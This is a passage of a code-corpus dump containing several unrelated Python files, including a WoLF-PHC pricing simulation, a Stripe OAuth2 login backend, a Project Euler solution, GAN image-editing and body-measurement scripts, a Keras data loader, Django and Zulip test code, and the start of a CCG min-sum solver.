        print("self.__meanPolicy =\n",self.__meanPolicy)
        print("self.__policy =\n",self.__policy)
class Record:
    """Fixed-size history of joint seller actions, used to detect convergence.

    Keeps the last `length` joint actions in a ring buffer; convergence means
    every seller's action has been identical across the whole window.
    """
    def __init__(self, N, length):
        self.__index = 0
        self.__N = N
        self.__length = length
        # Buffer pre-filled with -1 so the check cannot succeed before
        # `length` real joint actions have been recorded.
        self.__arr = np.full((self.__length, self.__N), -1)
    def isConverged(self, actions):
        """Record `actions` (np.array of action indices) and report convergence."""
        # Overwrite the oldest slot, then advance the ring index.
        self.__arr[self.__index] = actions
        self.__index = (self.__index + 1) % self.__length
        # Converged iff each column (seller) is constant over the window,
        # i.e. every per-seller variance is zero.
        return bool(np.var(self.__arr, axis=0).sum() == 0)
def wolfphc_MultiState(N,M,c,V,a,y_min,y_max,actionNumber):
    """Run multi-state WoLF-PHC learning for N providers until convergence.

    Returns the array of per-seller utilities (revenue minus expense) on
    success, or False if no convergence within the time limit.  M is unused
    here but kept for signature compatibility with callers.
    """
    #******(1) Parameter setup *************
    # Q-table parameters
    df = 0.30 #discount factor -- recommended range df ∈ [0.88,0.99]
    α = 1 / 3 # learning rate for updating Q values
    # Provider parameters
    sellerActionSize = actionNumber # number of provider actions
    # One state per joint action of all N sellers.
    stateSize = sellerActionSize ** N
    #******(2) Initialise the sellers *************
    sellers = []
    for j in range(0,N):
        tmpSeller = Seller(j,sellerActionSize,stateSize,c[j],y_min,y_max)
        # tmpSeller.show()
        sellers.append(tmpSeller)
    #******(3) Update Q tables, mean policies and policies *************
    # Records the joint actions of the last 500 consecutive iterations,
    # used to decide whether learning has converged.
    record = Record(N,500)
    start = time.perf_counter()
    timeLimit_min = 2 # time limit in minutes
    t = -1
    while 1:
        # Decaying "win" step size for the WoLF policy update.
        t += 1
        δ_win = 1 / (500 + 0.1 * t)
        # Collect the joint action of all providers for this iteration.
        allSellerActions = []
        for tmpSeller in sellers:
            allSellerActions.append(tmpSeller.actionSelect())
        allSellerActions = np.array(allSellerActions)
        yAll = sellerAction2y(allSellerActions,sellerActionSize,y_min,y_max)
        # Per-seller: compute demand x_j, then update Q table, mean policy,
        # policy and state.
        for j in range(0,N):
            x_j = V * yAll[j] + a - np.e
            sellers[j].updateQ(allSellerActions,x_j,α,df,N,sellerActionSize)
            sellers[j].updateMeanPolicy()
            sellers[j].updatePolicy(δ_win)
            sellers[j].updateState()
        # Convergence criterion: all sellers' actions unchanged over the
        # most recent 500 consecutive iterations.
        if record.isConverged(allSellerActions) == True:
            break
        # Give up (return False) once the wall-clock limit is exceeded.
        stop = time.perf_counter()
        if (stop - start) / 60.0 > timeLimit_min:
            return False
    # WoLF-PHC loop finished.
    #******(4) Return the array of each seller's utility *************
    # Recompute the demand vector X for the converged prices.
    X = []
    for j in range(0,N):
        x_j = V * yAll[j] + a - np.e # x_j is an np.array
        X.append(x_j)
    X = np.array(X)
    # Utility = revenue - expense, per seller.
    return pf.sellerRevenuesCalculator(X,yAll,N) - pf.sellerExpensesCalculator(X,yAll,c,N)
#******(5)打印结果、画变化曲线*************
# print("\n打印policy:")
# for tmpSeller in sellers:
# tmpSeller.showPolicy()
#打印出所有卖家最后的单价p
# P = Y[-1]
# P = 1 / P
#print("\n打印结果:")
#print("P =",P)
#画出Y的每一行,就是每一个卖家的y的变化
# Y = np.array(Y)
# Y = Y.T
# iteration = range(0,np.shape(Y)[1])
# plt.figure()
# for j in range(0,N):
# plt.plot(iteration,Y[j],label = "seller %d"%j)
# plt.legend(loc=2,ncol=1)
# plt.xlabel('iteration')
# plt.ylabel('y')
# plt.savefig('yWith%dSellersAnd%dBuyer.jpg'%(N,M), dpi=300)
# plt.show()
print("\nwolfphc_MultiSate:\nactions = %r"%allSellerActions) | StarcoderdataPython |
6451273 | """
Stripe OAuth2 support.
This backend adds support for Stripe OAuth2 service. The settings
STRIPE_APP_ID and STRIPE_API_SECRET must be defined with the values
given by Stripe application registration process.
"""
from social_auth.backends import BaseOAuth2, OAuthBackend, USERNAME
from social_auth.exceptions import AuthFailed, AuthCanceled
class StripeBackend(OAuthBackend):
    """Stripe OAuth2 authentication backend."""
    name = 'stripe'
    # Stripe identifies the connected account by its user id, not an email.
    ID_KEY = 'stripe_user_id'
    # Extra token-response fields persisted on the social-auth association.
    EXTRA_DATA = [
        ('stripe_publishable_key', 'stripe_publishable_key'),
        ('access_token', 'access_token'),
        ('livemode', 'livemode'),
        ('token_type', 'token_type'),
        ('refresh_token', 'refresh_token'),
        ('stripe_user_id', 'stripe_user_id'),
    ]
    def get_user_details(self, response):
        """Return user details from Stripe account.

        Stripe's token response carries no email, so it is left blank and
        the stripe_user_id doubles as the username.
        """
        return {USERNAME: response.get('stripe_user_id'),
                'email': ''}
class StripeAuth(BaseOAuth2):
    """Stripe OAuth2 support (docstring previously said "Facebook" --
    a copy-paste leftover)."""
    AUTH_BACKEND = StripeBackend
    AUTHORIZATION_URL = 'https://connect.stripe.com/oauth/authorize'
    ACCESS_TOKEN_URL = 'https://connect.stripe.com/oauth/token'
    SCOPE_VAR_NAME = 'STRIPE_SCOPE'
    SETTINGS_KEY_NAME = 'STRIPE_APP_ID'
    SETTINGS_SECRET_NAME = 'STRIPE_APP_SECRET'
    # Stripe changes the state parameter on some unclear way and doesn't send
    # the redirect_state value if was defined in redirect_uri, they redirect to
    # the URL defined in the app only
    REDIRECT_STATE = False
    STATE_PARAMETER = False
    def process_error(self, data):
        """Raise AuthCanceled for user denial, AuthFailed for other errors."""
        if self.data.get('error'):
            error = self.data.get('error_description') or self.data['error']
            if self.data['error'] == 'access_denied':
                raise AuthCanceled(self, error)
            else:
                raise AuthFailed(self, error)
    def auth_params(self, state=None):
        """Authorization-request parameters (client_secret is unused here)."""
        client_id, client_secret = self.get_key_and_secret()
        return {
            'response_type': self.RESPONSE_TYPE,
            'client_id': client_id
        }
    def auth_complete_params(self, state=None):
        """Token-exchange POST body for the authorization-code grant."""
        client_id, client_secret = self.get_key_and_secret()
        return {
            'grant_type': 'authorization_code',
            'client_id': client_id,
            'scope': self.SCOPE_SEPARATOR.join(self.get_scope()),
            'code': self.data['code']
        }
    def auth_complete_headers(self):
        """Stripe authenticates the token exchange with the app secret as a
        bearer token rather than a client_secret body field."""
        client_id, client_secret = self.get_key_and_secret()
        return {
            'Accept': 'application/json',
            'Authorization': 'Bearer %s' % client_secret
        }
# Backend definition: maps the backend name to its auth class so
# social-auth can discover it.
BACKENDS = {
    'stripe': StripeAuth
}
| StarcoderdataPython |
3521452 | # projecteuler.net/problem=19
# Weekday names; index 0 is Sunday (CountingSundays counts weekday == 0).
days = ('sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat')
month = ('jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec')
# Month lengths for a common year and a leap year respectively.
d_mon = ( 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)
d_mon_leap = ( 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)
start_year = 1900  # NOTE(review): unused below
count_year = 1901  # NOTE(review): unused below
days_in_year = 365  # NOTE(review): unused below
# 01.01.1901 - Tuesday
def main():
    """Compute and print the Project Euler #19 answer."""
    print(CountingSundays())
def CountingSundays():
    """Count first-of-month Sundays from 1901-01-01 through 2000-12-31.

    Weekday bookkeeping matches the module-level ``days`` tuple (0 == Sunday).
    The counter is seeded with 1 so that the very first day processed
    advances to 2, i.e. Tuesday 1901-01-01.
    """
    sundays = 0
    weekday = 1  # becomes 2 (Tuesday) on the first day of the walk
    for year in range(1901, 2001):
        # Gregorian leap-year rule selects the month-length table.
        is_leap = year % 4 == 0 and year % 100 != 0 or year % 400 == 0
        month_lengths = d_mon_leap if is_leap else d_mon
        for month_index in range(len(month)):
            for day in range(1, month_lengths[month_index] + 1):
                weekday += 1
                if weekday >= 7:
                    weekday = 0
                if weekday == 0 and day == 1:
                    sundays += 1
    return sundays
if __name__ == '__main__':
    # Script entry point.
    main()
| StarcoderdataPython |
12820161 | <reponame>phygitalism/PTI
import argparse
import os
import sys
import pickle
import numpy as np
from tqdm import tqdm
from PIL import Image
import torch
from configs import paths_config, hyperparameters, global_config
from utils.align_data import pre_process_images
from scripts.run_pti import run_PTI
from IPython.display import display
import matplotlib.pyplot as plt
from scripts.latent_editor_wrapper import LatentEditorWrapper
import shutil
def load_generators(model_id, image_name):
    """Load the PTI-fine-tuned generator checkpoint for one image onto CUDA.

    SECURITY NOTE: torch.load unpickles arbitrary Python objects -- only
    load checkpoints from trusted sources.
    """
    with open(f'{paths_config.checkpoints_dir}/model_{model_id}_{image_name}.pt', 'rb') as f_new:
        new_G = torch.load(f_new).cuda()
    return new_G
def gen_vec(image_name, latent_editor, alpha, step):
    """Build InterfaceGAN edit latents for one embedded image.

    Returns a {direction: {factor: latent}} mapping with `step` edit factors
    evenly spaced in [-alpha, alpha].
    """
    w_path_dir = f'{paths_config.embedding_base_dir}/{paths_config.input_data_id}'
    embedding_dir = f'{w_path_dir}/{paths_config.pti_results_keyword}/{image_name}'
    # 0.pt is the pivot latent produced by the PTI inversion step.
    w_pivot = torch.load(f'{embedding_dir}/0.pt')
    latents_vec = latent_editor.get_single_interface_gan_edits(w_pivot, np.linspace(-alpha, alpha, step))
    return latents_vec
def gen_img(image_name, model_id, latents_vec, base_save_path):
    """Synthesise and save one image per (direction, factor) latent edit.

    Args:
        image_name: source file name, e.g. "face.png".
        model_id: identifier of the fine-tuned generator checkpoint.
        latents_vec: {direction: {factor: latent}} mapping from gen_vec().
        base_save_path: root directory for the generated images.
    """
    # rsplit keeps dots inside the stem intact; the original split('.')
    # raised ValueError for names such as "img.v2.png".
    image_name, ext = image_name.rsplit('.', 1)
    generator_type = paths_config.multi_id_model_type if hyperparameters.use_multi_id_training else image_name
    new_G = load_generators(model_id, generator_type)
    for direction, factor_and_edit in latents_vec.items():
        for val, latent in factor_and_edit.items():
            img = new_G.synthesis(latent, noise_mode='const', force_fp32 = True)
            # [-1, 1] float NCHW -> [0, 255] uint8 HWC for PIL.
            img = (img.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to(torch.uint8).cpu().numpy()[0]
            img = Image.fromarray(img, mode='RGB')
            path = os.path.join(base_save_path, image_name, direction)
            os.makedirs(path, exist_ok=True)
            img.save(os.path.join(path, str(val) + "_" + image_name + '.' + ext))
def evaluate(args):
    """Run the full PTI pipeline: align inputs, tune generators, apply
    InterfaceGAN edits and save the resulting images.

    Assumes inputs live under /home/data/image_original -- TODO confirm
    these hard-coded container paths.
    """
    os.makedirs(paths_config.input_data_path, exist_ok=True)
    pre_process_images('/home/data/image_original')
    model_id = run_PTI(use_wandb=False, use_multi_id_training=hyperparameters.use_multi_id_training)
    latent_editor = LatentEditorWrapper()
    name_list = os.listdir('/home/data/image_original')
    base_save_path = os.path.join('/home/data/image_results', paths_config.input_data_id)
    os.makedirs(base_save_path, exist_ok=True)
    # Inference only: no gradients needed for synthesis.
    with torch.no_grad():
        for image_name in tqdm(name_list):
            latents_vec = gen_vec(image_name.split('.')[0], latent_editor, alpha=args.alpha, step=args.step)
            gen_img(image_name, model_id, latents_vec, base_save_path)
            print(f'Done for {image_name}')
def clean_up():
    """Delete the intermediate artifacts produced by a PTI run."""
    for directory in (paths_config.input_data_path,
                      paths_config.checkpoints_dir,
                      paths_config.embedding_base_dir):
        shutil.rmtree(directory)
if __name__ == "__main__":
    # CLI entry point: parse edit parameters, run the pipeline, clean up.
    parser = argparse.ArgumentParser()
    parser.add_argument("--alpha", type=float, default=10, help="[-alpha,... alpha] range")
    parser.add_argument("--step", type=int, default=20, help="num for numpy.linspace")
    parser.add_argument("--data_name", type=str, default='test', help="dataset name")
    # NOTE(review): action='store_true' combined with default=True means this
    # flag is ALWAYS True and passing --clean_up changes nothing; the intended
    # default was presumably False -- confirm before changing behaviour.
    parser.add_argument('--clean_up', action='store_true', default=True, help='delete permanent files after run')
    args = parser.parse_args()
    paths_config.input_data_id = args.data_name
    evaluate(args)
    if args.clean_up:
        clean_up()
278892 | from django.db import models
from django.contrib.auth import get_user_model
# Create your models here.
class Book(models.Model):
    """A book recommendation posted by a registered user."""
    title = models.CharField(max_length=50)
    author = models.CharField(max_length=30)
    description = models.TextField(blank=True)
    # Link to the publisher's page for this book.
    publisher_book_url = models.URLField()
    # auto_now_add: set once at row creation -- despite the name this is the
    # posting timestamp, not the book's publication date (TODO confirm).
    released_on = models.DateTimeField(auto_now_add=True)
    # Deleting the user cascades to their posted books.
    posted_user = models.ForeignKey(get_user_model(), null=True, on_delete=models.CASCADE)
| StarcoderdataPython |
6689710 | import cv2
from tensorflow import keras
import numpy as np
from config import debug
from augmentation import get_random_affine_transformation
import matplotlib.pyplot as plt
from data_utils import is_annotation
class VagusDataLoader(keras.utils.Sequence):
    """
    Custom Data Loader class to iterate over the data (as Numpy arrays)
    Attributes
    ---------------
    batch_size: int
        the number of images would be loaded in a batch
    img_size: tuple (int, int)
        the size of the image being loaded
    input_img_paths: str
        system paths to the input (original) images
    target_img_paths: str
        system paths to the target (mask) images
    """
    def __init__(self, batch_size, img_size, input_img_paths, target_img_paths):
        """ Class constructor """
        self.batch_size = batch_size
        self.img_size = img_size
        self.input_img_paths = input_img_paths
        self.target_img_paths = target_img_paths
    def __len__(self):
        """ Overriding len(): number of whole batches (remainder dropped). """
        return len(self.target_img_paths) // self.batch_size
    def __getitem__(self, idx):
        """
        Overriding get()
        Parameters
        ---------------
        idx: int
            The index of the current batch to get from the dataset
        Returns
        ---------------
        the idx-th batch of images in the tuple format of (input, target)
        """
        i = idx * self.batch_size
        batch_input_img_paths = self.input_img_paths[i : i + self.batch_size]
        batch_target_img_paths = self.target_img_paths[i : i + self.batch_size]
        # x: float RGB inputs in [0, 1] (enforced by the assert below);
        # y: binary single-channel masks.
        x = np.zeros((self.batch_size,) + self.img_size + (3,), dtype="float32")
        y = np.zeros((self.batch_size,) + self.img_size + (1,), dtype="uint8")
        for j, (img_path, target_path) in enumerate(zip(batch_input_img_paths, batch_target_img_paths)):
            img = np.load(img_path)
            annotation = np.load(target_path)
            annotation = np.expand_dims(annotation, axis=2)
            # A fresh random affine transform per sample, applied identically
            # to the image and its annotation so they stay aligned.
            current_transform = get_random_affine_transformation()
            augmented_img = current_transform(img, do_colour_transform=False)
            augmented_annotation = current_transform(annotation, is_annotation=True, do_colour_transform=False)
            # Re-binarise: interpolation during warping produces fractional values.
            augmented_annotation = cv2.threshold(augmented_annotation, 0.5, 1, cv2.THRESH_BINARY)[1]
            augmented_annotation = np.expand_dims(augmented_annotation, axis=2)
            x[j] = augmented_img
            y[j] = augmented_annotation
        # Useful debug code
        if debug:
            print(f'Data loader first x, y pair - x shape: {x.shape}, x min max: {np.min(x)}, {np.max(x)}, y shape: {y.shape}, y values: {np.unique(y, return_counts=True)}')
            print('x')
            plt.imshow(x[0, :, :, :])
            plt.show()
            print('y')
            plt.imshow(y[0, :, :, 0])
            plt.show()
        # Final checks on tensor formats.
        # NOTE(review): the assert messages use print(...), which evaluates
        # eagerly and yields None as the assertion message; also asserts are
        # stripped when Python runs with -O.
        assert is_annotation(y), print(np.unique(y))
        assert np.max(x) <= 1 and np.min(x) >= 0, print(np.unique(x))
        assert x.shape[-1] == 3
return x, y | StarcoderdataPython |
109197 | <filename>src/features/main_measure.py
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 15 08:44:26 2021
@author: gabri
"""
from features.utils import *
def main(filename = None):
    """Estimate body measurements (leg, arm, hip) from an OpenPose-annotated image.

    When *filename* is given the function is assumed to run under FastAPI and
    reads from ../data/processed; otherwise the paths come from environment
    variables set by the CLI entry point below.  Returns a JSON string with
    'leg-length', 'arm-length' and 'hip-length' in pixels.
    """
    print(filename,os.getcwd())
    #running with FASTAPI
    if(filename is not None):
        os.environ['filename'],file_extension = filename.split('.')[:]
        # NOTE(review): missing path separator in this debug print only.
        print('../data/processed' + filename)
        rgb = cv2.imread(os.path.join('../data/processed' , filename))
        # NOTE(review): cv2.imread returns None for a missing file, which
        # would make this .shape access raise -- confirm upstream validation.
        print(rgb.shape)
        os.environ['label_path'] = '../labels/processed/'
    else:
        file_extension = os.environ['filename'].split('.')[1]
    # Load the image in RGB, YUV and grayscale.
    # NOTE(review): this re-reads from os.environ['image_path'] even in the
    # FastAPI branch above, discarding the image just read -- confirm intent.
    rgb = cv2.imread( os.path.join(os.environ['image_path'] ,os.environ['filename']))
    yuv = cv2.cvtColor(rgb, cv2.COLOR_RGB2YUV)
    gray = cv2.cvtColor(rgb, cv2.COLOR_RGB2GRAY)
    # Local-entropy image (disk radius 5), scaled to [0, 1].
    entr_img = entropy(gray, disk(5))
    scaled_entropy = entr_img / entr_img.max()
    entr_img = scaled_entropy
    #for debugging purposes: entropy image
    # plt.imshow(entr_img > 0.4)
    # plt.show()
    # Stack RGB and YUV channels for more information about colours and
    # their intensities (6-channel feature image).
    rgb_yuv = np.concatenate((np.array(rgb),np.array(yuv) ), axis = 2 )
    json_file = os.environ['filename'].split('.')[0] + ".json"
    with open( os.path.join(os.environ['label_path'] ,json_file) ) as f:
        data = json.load(f)
    # OpenPose keypoints come as a flat [x, y, confidence, ...] list.
    pose_keypoints = data['people'][0]['pose_keypoints_2d']
    # Draw the kept keypoints (with their indices) on the image.
    counter = 1
    keypoint_list = {}
    toKeep = [3,4,5,6,7,8,9,10,11,13,12,14,15]
    for i in range(0,len(pose_keypoints),3):
        x,y = pose_keypoints[i],pose_keypoints[i+1]
        x,y = int(x),int(y)
        if(counter in toKeep):
            keypoint_list[str(counter)] = (x,y)
            cv2.circle(rgb, (x,y), radius=0, color=(0, 0, 255), thickness=5)
            cv2.putText(rgb, str(counter), (x - 20, y - 20),
                cv2.FONT_HERSHEY_SIMPLEX, 0.65, (0, 255, 0), 2)
        counter +=1
    # Convert numeric keypoint indices to human-readable names.
    keypoint_dict = build_dict(keypoint_list)
    height,width,_ = rgb.shape
    # Gabor filter bank used as texture features.
    kernels = create_gabor_kernels()
    # Horizontal line through the hips.
    full_line ,waist_line,_,_ =get_line(keypoint_dict['l_hip'],keypoint_dict['r_hip'], width)
    # Training data for the per-pixel body/background classifier.
    train_x,train_y,test_x = get_data(keypoint_dict,full_line,waist_line, rgb_yuv,entr_img,kernels)
    # Predict each pixel on the hip line (0 appears to mean "body" below).
    pred = predict_pixel_values(keypoint_dict,train_x,train_y,test_x)
    # Visualise predictions along the hip line for debugging.
    res_line = []
    for i in range(len(pred)):
        x,y = full_line[i]
        res = np.argmax(pred[i])
        res_line.append(res)
        if(res == 0):
            cv2.circle(rgb, (x+3,y), radius=0, color=(255, 0, 0), thickness=5)
    # Approximate the waist width: scan inwards from each side and accept a
    # boundary once 10 consecutive "background" (1) pixels have been seen.
    toll = 10
    l_w_point = keypoint_dict['l_h']
    for i in range(0,keypoint_dict['l_hip'][0],1):
        if(res_line[i] == 1):
            toll -= 1
        else:
            toll= 10
        if( toll == 0):
            x,y = full_line[i]
            l_w_point = [x+3-10,y]
            cv2.circle(rgb, (x+3-10,y), radius=0, color=(0, 255, 0), thickness=20)
            break
    toll = 10
    r_w_point = keypoint_dict['r_h']
    for i in range(rgb.shape[1]-8,keypoint_dict['r_hip'][0],-1):
        if(res_line[i] == 1):
            toll -= 1
        else:
            toll= 10
        if( toll == 0):
            x,y = full_line[i]
            r_w_point = [x-4+10,y]
            cv2.circle(rgb, (x-4+10,y), radius=0, color=(0, 255, 0), thickness=20)
            break
    # Shoulder line and derived measurements.
    full_shoulder_line,shoulder_line,_,_ =get_line(keypoint_dict['l_s'],keypoint_dict['r_s'],width)
    get_arm_boundaries(full_shoulder_line,gray)
    mean_leg_length,mean_arm_length = get_measures(keypoint_dict)
    # Euclidean distance between the detected left/right waist points.
    hip_length = abs(np.linalg.norm(np.array(l_w_point)-np.array(r_w_point)))
    get_upper_body_measures(keypoint_dict,width,rgb)
    print('leg length: {}, arm length: {}, hip_length: {}'.format(mean_leg_length,mean_arm_length,hip_length))
    # Show the annotated image at half size; waitKey(0) blocks until a key
    # press (problematic in a headless/FastAPI deployment -- TODO confirm).
    rgb = cv2.resize(rgb, ( int(width/2),int(height/2) ))
    cv2.imshow('img',rgb)
    cv2.waitKey(0)
    res = {}
    res['leg-length'] = mean_leg_length
    res['arm-length'] = mean_arm_length
    res['hip-length'] = hip_length
    return json.dumps(res)
def dir_path(string):
    """argparse `type=` helper: ensure *string* is an existing directory.

    Returns the path with backslashes normalised to forward slashes, or
    raises NotADirectoryError for argparse to report.
    """
    if not os.path.isdir(string):
        raise NotADirectoryError(string)
    return string.replace('\\', '/')
if __name__ == "__main__":
    # initialize ArgumentParser class of argparse
    parser = argparse.ArgumentParser()
    # `required=True` replaces the post-parse `assert` checks: asserts are
    # stripped under `python -O`, and argparse gives a proper usage error.
    # where the original images (used for creating the synthetic images) are
    parser.add_argument(
        "--image_path",
        type=str,
        required=True
    )
    parser.add_argument(
        "--label_path",
        type=str,
        required=True
    )
    parser.add_argument(
        "--filename",
        type=str,
        required=True
    )
    args = parser.parse_args()
    # NOTE(review): replace('\\\\', ' ') turns escaped double backslashes
    # into spaces -- kept as-is, but the intent looks questionable; confirm.
    os.environ['image_path'] = args.image_path.replace('\\\\', ' ')
    os.environ['label_path'] = args.label_path.replace('\\\\', ' ')
    os.environ['filename'] = args.filename
    main()
| StarcoderdataPython |
6691103 | from datetime import datetime, timedelta, timezone
from typing import Any, Dict
from unittest import mock
from django.utils.timezone import now as timezone_now
from zerver.lib.stream_topic import StreamTopicTarget
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.topic_mutes import (
add_topic_mute,
get_topic_mutes,
remove_topic_mute,
topic_is_muted,
)
from zerver.models import MutedTopic, UserProfile, get_stream
class MutedTopicsTests(ZulipTestCase):
def test_user_ids_muting_topic(self) -> None:
hamlet = self.example_user("hamlet")
cordelia = self.example_user("cordelia")
realm = hamlet.realm
stream = get_stream("Verona", realm)
recipient = stream.recipient
topic_name = "teST topic"
stream_topic_target = StreamTopicTarget(
stream_id=stream.id,
topic_name=topic_name,
)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, set())
def mute_user(user: UserProfile) -> None:
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="test TOPIC",
date_muted=timezone_now(),
)
mute_user(hamlet)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, {hamlet.id})
hamlet_date_muted = MutedTopic.objects.filter(user_profile=hamlet)[0].date_muted
self.assertTrue(timezone_now() - hamlet_date_muted <= timedelta(seconds=100))
mute_user(cordelia)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, {hamlet.id, cordelia.id})
cordelia_date_muted = MutedTopic.objects.filter(user_profile=cordelia)[0].date_muted
self.assertTrue(timezone_now() - cordelia_date_muted <= timedelta(seconds=100))
def test_add_muted_topic(self) -> None:
user = self.example_user("hamlet")
self.login_user(user)
stream = get_stream("Verona", user.realm)
url = "/api/v1/users/me/subscriptions/muted_topics"
payloads = [
{"stream": stream.name, "topic": "Verona3", "op": "add"},
{"stream_id": stream.id, "topic": "Verona3", "op": "add"},
]
mock_date_muted = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
for data in payloads:
with mock.patch(
"zerver.views.muting.timezone_now",
return_value=datetime(2020, 1, 1, tzinfo=timezone.utc),
):
result = self.api_patch(user, url, data)
self.assert_json_success(result)
self.assertIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
self.assertTrue(topic_is_muted(user, stream.id, "Verona3"))
self.assertTrue(topic_is_muted(user, stream.id, "verona3"))
remove_topic_mute(
user_profile=user,
stream_id=stream.id,
topic_name="Verona3",
)
def test_remove_muted_topic(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
recipient = stream.recipient
url = "/api/v1/users/me/subscriptions/muted_topics"
payloads = [
{"stream": stream.name, "topic": "vERONA3", "op": "remove"},
{"stream_id": stream.id, "topic": "vEroNA3", "op": "remove"},
]
mock_date_muted = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
for data in payloads:
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="Verona3",
date_muted=datetime(2020, 1, 1, tzinfo=timezone.utc),
)
self.assertIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
result = self.api_patch(user, url, data)
self.assert_json_success(result)
self.assertNotIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
self.assertFalse(topic_is_muted(user, stream.id, "verona3"))
def test_muted_topic_add_invalid(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
recipient = stream.recipient
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="Verona3",
date_muted=timezone_now(),
)
url = "/api/v1/users/me/subscriptions/muted_topics"
data: Dict[str, Any] = {"stream": stream.name, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic already muted")
data = {"stream_id": 999999999, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Invalid stream id")
data = {"topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please supply 'stream'.")
data = {"stream": stream.name, "stream_id": stream.id, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please choose one: 'stream' or 'stream_id'.")
def test_muted_topic_remove_invalid(self) -> None:
    """Removing a mute must fail for unmuted/unknown streams and topics
    and for malformed payloads."""
    user = self.example_user("hamlet")
    self.login_user(user)
    stream = get_stream("Verona", user.realm)
    url = "/api/v1/users/me/subscriptions/muted_topics"
    # Each invalid payload is paired with the exact error the endpoint must report.
    cases = [
        ({"stream": "BOGUS", "topic": "Verona3", "op": "remove"},
         "Topic is not muted"),
        ({"stream": stream.name, "topic": "BOGUS", "op": "remove"},
         "Topic is not muted"),
        ({"stream_id": 999999999, "topic": "BOGUS", "op": "remove"},
         "Topic is not muted"),
        ({"topic": "Verona3", "op": "remove"},
         "Please supply 'stream'."),
        ({"stream": stream.name, "stream_id": stream.id, "topic": "Verona3", "op": "remove"},
         "Please choose one: 'stream' or 'stream_id'."),
    ]
    for data, error in cases:
        result = self.api_patch(user, url, data)
        self.assert_json_error(result, error)
| StarcoderdataPython |
4848283 | <reponame>easydatapy/easydata
import pytest
from easydata import parsers
default_email = "<EMAIL>"
@pytest.mark.parametrize(
    "test_data, result",
    [
        ("<EMAIL>", default_email),
        ("contact:<EMAIL>'", default_email),
        ("contact;<EMAIL>", default_email),
        ('<input value="<EMAIL>">', default_email),
        ('<a href="mailto:<EMAIL>">Here</a>', default_email),
        ("Contact please <EMAIL>!!!", default_email),
        (",<EMAIL>,", default_email),
        ("Contact please <EMAIL>!!!", "<EMAIL>"),
        ("<EMAIL>", "<EMAIL>"),
        ("<EMAIL>", "<EMAIL>"),
        ("<EMAIL>", "<EMAIL>"),
        ("<EMAIL>", "<EMAIL>"),
        ("<EMAIL>", "<EMAIL>"),
        ("<EMAIL>", "<EMAIL>"),
        ("<EMAIL>", "<EMAIL>"),
        ("Uppercase works to <EMAIL>", "<EMAIL>"),
        ("easydatapy@gmail", None),
        ("easydatapy@", None),
        ("@<EMAIL>", None),
        (None, None),
        ("", None),
    ],
)
def test_email(test_data, result):
    # Email() must extract a single well-formed address out of noisy input,
    # and yield None when no valid address is present.
    email_parser = parsers.Email()
    assert email_parser.parse(test_data) == result
@pytest.mark.parametrize(
    "test_data, domain, result",
    [
        ("easydatapy", "gmail.com", default_email),
        ("easydatapy@", "gmail.<EMAIL>", default_email),
        ("Contact please <EMAIL>@", "gmail.<EMAIL>", default_email),
        ("Contact please easydatapy@ !!!", "gmail.com", None),
        ("easydatapy@@", "gmail.com", None),
        ("easydatapy@", "gmail", None),
    ],
)
def test_email_domain(test_data, domain, result):
    # With a domain hint, Email() should complete partial addresses but still
    # reject input that cannot form a valid address.
    email_parser = parsers.Email(domain=domain)
    assert email_parser.parse(test_data) == result
def test_email_domain_lowercase():
    # lowercase=True must normalize the extracted address to lower case.
    raw_value = "<EMAIL>"
    parsed = parsers.Email(lowercase=True).parse(raw_value)
    assert parsed == "<EMAIL>"
| StarcoderdataPython |
3564612 | <filename>src/algorithms/ccg_centralized.py<gh_stars>1-10
import networkx as nx
import numpy as np
from algorithms.algorithm import Algorithm
from utils.ccg_utils import transform_dcop_instance_to_ccg, set_var_value
class CCGCentralized(Algorithm):
    """Centralized min-sum message passing on the constraint composite graph (CCG).

    The DCOP instance is transformed into a CCG; a single designated root agent
    then runs synchronous min-sum belief propagation over the whole graph,
    reads off a vertex cover from the converged messages, and maps the cover
    back onto variable assignments via ``set_var_value``.
    """

    def __init__(self, name, dcop_instance, args=None, ccg=None, seed=1234):
        """Build the solver.

        Args:
            name: algorithm name passed to the Algorithm base class.
            dcop_instance: the DCOP problem to solve.
            args: option dict supporting 'max_iter' and 'damping'
                  (defaults to {'max_iter': 10, 'damping': 0}).
            ccg: optional precomputed constraint composite graph.
            seed: RNG seed forwarded to the base class.
        """
        # Avoid the shared-mutable-default pitfall of the original signature
        # (args={'max_iter': 10, 'damping': 0} was a single shared dict).
        if args is None:
            args = {'max_iter': 10, 'damping': 0}
        super(CCGCentralized, self).__init__(name, dcop_instance, args, seed)
        self.damping = args['damping']
        if ccg is not None:
            self.ccg = ccg
        else:
            self.ccg = transform_dcop_instance_to_ccg(dcop_instance)
        # msgs[u][v] is the 2-vector message from node u to its neighbor v
        # (one entry per boolean state of v in the vertex-cover encoding).
